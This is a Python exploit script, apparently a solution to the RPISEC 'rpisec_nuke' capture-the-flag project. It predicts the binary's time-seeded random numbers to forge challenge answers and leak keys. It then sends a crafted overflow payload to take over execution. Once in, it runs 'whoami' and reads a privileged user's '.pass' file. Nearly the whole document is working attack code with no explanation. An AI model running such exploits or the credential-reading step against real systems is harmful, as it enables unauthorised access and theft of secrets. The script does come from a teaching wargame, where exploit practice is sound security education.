| #!/usr/bin/env python | |
| # project 1 helper script | |
| import subprocess | |
| import binascii | |
| import struct | |
| import sys | |
| import ctypes | |
| import time | |
| from operator import xor | |
| def signThis(i): | |
| return ctypes.c_int32(i).value | |
| # function to read the file descriptor until it finds a string | |
| def readuntil(fd, needle): | |
| data = "" | |
| while needle not in data: | |
| data += fd.read(1) | |
| return data | |
| def dumpOutput(fd): | |
| print "+---------------+" | |
| print "|****DUMPING****|" | |
| print "+---------------+" | |
| while True: | |
| sys.stdout.write(fd.read(1)) | |
| def tohex(val, nbits): | |
| return hex((val + (1 << nbits)) % (1 << nbits)) | |
| def dots(x): | |
| splitSize = 2 | |
| ret = [x[i:i+splitSize] for i in range(0, len(x), splitSize)] | |
| return '.'.join(ret) | |
| def xorChallenges(first_challenge, challenge): | |
| first_challenge = [''.join(x.split('.')) for x in first_challenge] | |
| challenge = [''.join(x.split('.')) for x in challenge] | |
| splitSize = 2 | |
| for j in xrange(len(first_challenge)): | |
| x = first_challenge[j] | |
| first_challenge[j] = [x[i:i+splitSize] for i in range(0, len(x), splitSize)] | |
| for j in xrange(len(challenge)): | |
| x = challenge[j] | |
| challenge[j] = [x[i:i+splitSize] for i in range(0, len(x), splitSize)] | |
| # Xor all the values together | |
| xored = [] | |
| for j in xrange(len(challenge)): | |
| x = challenge[j] | |
| y = first_challenge[j] | |
| xored.append([]) | |
| for k in xrange(len(x)): | |
| a = ctypes.c_ubyte(int(x[k],16)).value | |
| b = ctypes.c_ubyte(int(y[k],16)).value | |
| xoval = hex(ctypes.c_ubyte(a ^ b).value) | |
| xored[j].append(xoval) | |
| for i in xrange(len(xored)): | |
| line = xored[i] | |
| xored[i] = "".join(["00"[len(x[2:]):]+x[2:] for x in line]) | |
| return xored | |
| def findChallenge(cline, ctime, offset): | |
| # Get our random numbers ( 4 needed ) | |
| crand.seed_rand(ctime) | |
| rNums = [] | |
| for _ in xrange(offset): | |
| crand.get_random() | |
| for _ in xrange(4): | |
| rNums.append(crand.get_random()) | |
| # Get the integer values for xoring | |
| cline = ''.join(cline.split('.')) | |
| splitSize = 8 | |
| words = [cline[i:i+splitSize] for i in range(0, len(cline), splitSize)] | |
| # This flips for little endian | |
| for wi in xrange(len(words)): | |
| w = words[wi] | |
| splitSize = 2 | |
| words[wi] = ''.join([w[i:i+splitSize] for i in range(0, len(w), splitSize)[::-1]]) | |
| intVals = [ signThis(int('0x'+x,16)) for x in words ] | |
| # Xor all the values together | |
| xored = [] | |
| for i in range(4): | |
| a = rNums[i] | |
| b = intVals[i] | |
| xored.append(ctypes.c_uint32(a ^ b).value) | |
| # Turn the int values back to hex | |
| xoredHex = [ tohex(x,32)[2:-1] for x in xored ] | |
| # Pad those values with 0's for the memory | |
| xoredHex = [ "00000000"[len(x):]+x for x in xoredHex ] | |
| # Flip them for memory order | |
| for xi in xrange(len(xoredHex)): | |
| x = xoredHex[xi] | |
| splitSize = 2 | |
| xoredHex[xi] = ''.join([x[i:i+splitSize] for i in range(0, len(x), splitSize)[::-1]]) | |
| cAns = ''.join(xoredHex) | |
| #splitSize = 2 | |
| #cAns = [cAns[i:i+splitSize] for i in range(0, len(cAns), splitSize)] | |
| #cAns = '.'.join(cAns) | |
| return cAns | |
| # Import our rand seeder | |
| crand = ctypes.cdll.LoadLibrary("./randlib.so") | |
| crand.seed_rand(int(time.time())) | |
| # run the project | |
| #p = subprocess.Popen('nc warzone.rpis.ec 31337', stdout=subprocess.PIPE, stdin=subprocess.PIPE, shell=True) | |
| #p = subprocess.Popen('/tmp/bleached/project2/rpisec_nuke', stdout=subprocess.PIPE, stdin=subprocess.PIPE, shell=True) | |
| p = subprocess.Popen('strace /tmp/bleached/project2/rpisec_nuke', stdout=subprocess.PIPE, stdin=subprocess.PIPE, shell=True) | |
| key2 = '00112233445566778899aabbccddeeff' | |
| key3 = ['00112233000000000000000000000000', '00000000445566770000000000000000', '00000000000000008899aabb00000000', '000000000000000000000000ccddeeff'] | |
| #key2 = '4e96e75bd2912e31f3234f6828a4a897' | |
| #key3 = ['90357303000000000000000000000000', '00000000412ef8220000000000000000', '0000000000000000cd10e79800000000', '000000000000000000000000760491a6'] | |
| ############# | |
| # Third Key # | |
| ############# | |
| p.stdin.write("3\n") | |
| session = int(readuntil(p.stdout, "]=---------=|").split('\n')[-1].split(' ')[4][7:-7]) | |
| p.stdin.write(str(session)+"\n") | |
| print readuntil(p.stdout, "CHALLENGE (64 Bytes):") | |
| #GET CHALLENGE, GET TIME NOW | |
| challenge = readuntil(p.stdout, "-------------------------------------------------------\n") | |
| challenge = challenge.split("\n")[1:5] | |
| challenge[0] = challenge[0][7:] | |
| challenge = [l[30:] for l in challenge] | |
| print readuntil(p.stdout, "TIME NOW:") | |
| challenge_time = readuntil(p.stdout, "\n") | |
| challenge_time = int(challenge_time.strip()[7:]) | |
| # Get the seed | |
| CLine = challenge[0] | |
| seed = 0 | |
| for x in range(50): | |
| seed = ctypes.c_uint32(challenge_time + session - x).value | |
| if findChallenge(CLine, seed,0) == "00000000000000000000000000000000": | |
| break | |
| offset = 4 | |
| for x in xrange(4): | |
| challenge[x%4] = findChallenge(challenge[x%4], seed, offset*4) | |
| offset += 1 | |
| # Finally xor with the first_challenge to get the leak | |
| challenge = xorChallenges(key3, challenge) | |
| challenge_input = ''.join(challenge) | |
| p.stdin.write(challenge_input+"\n") | |
| ############## | |
| # Second Key # | |
| ############## | |
| p.stdin.write("2\n") | |
| print readuntil(p.stdout, "ENTER AES-128 CRYPTO KEY:") | |
| p.stdin.write(key2 + "\n") | |
| print readuntil(p.stdout, "ENTER LENGTH OF DATA (16 OR 32):") | |
| p.stdin.write("\n") | |
| print readuntil(p.stdout, "DATA LENGTH SET TO") | |
| p.stdin.write("\n") | |
| print readuntil(p.stdout, "AUTHENTICATING") | |
| p.stdin.write("\n") | |
| ############# | |
| # First Key # | |
| ############# | |
| p.stdin.write("1\n") | |
| p.stdin.write("\x00\n") | |
| p.stdin.write("\n") | |
| print readuntil(p.stdout, "+-----------------------------------------------------+") | |
| ################### | |
| # ON TO BOOM BOOM # | |
| ################### | |
| p.stdin.write("4\n") | |
| print readuntil(p.stdout, "READY") | |
| # My Program | |
| #program = "ADOOM\x00\x00\x00" # 8 bytes | |
| program = "I"*132 + "S"+'A'+"IS"+'A'+"IS"+'A'+"IS"+'A'+"ISRISAISLIS ISDISOISOISMIADOOM\x00\x00\x00" | |
| #program = "S"+'G'+"IS"+'E'+"IS"+'N'+"IS"+'E'+"ISRISAISLIS ISDISOISOISMIADOOM\x00\x00\x00" | |
| #program = "I"*62 + "OIOIOIOI" | |
| #program = "I"*132 + "S"+s[3]+"IS"+s[2]+"IS"+s[1]+"IS"+s[0]+"ISRISAISLIS ISDISOISOISMIADOOM\x00\x00\x00" | |
| p.stdin.write(program*2) | |
| p.stdin.write("\xa9\x59\xdc\xdc"+"\x4a\x00\x00\x00\x40\x45\x4e\x44\n") | |
| p.stdin.write("\n") | |
| p.stdin.write("CONFIRM\n") | |
| dumpOutput(p.stdout) | |
| print readuntil(p.stdout, "CYBER NUKE IS LAUNCHING") | |
| print readuntil(p.stdout, "ATTEMPTING TO CONNECT TO UPLINK") | |
| print readuntil(p.stdout, "EXECUTING...") | |
| print readuntil(p.stdout, "MISSION SUCCESS") | |
| # Got Root? | |
| time.sleep(0.5) | |
| p.stdin.write("whoami\n") | |
| time.sleep(0.5) | |
| p.stdin.write("cat /home/project2_priv/.pass\n") | |
| dumpOutput(p.stdout) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment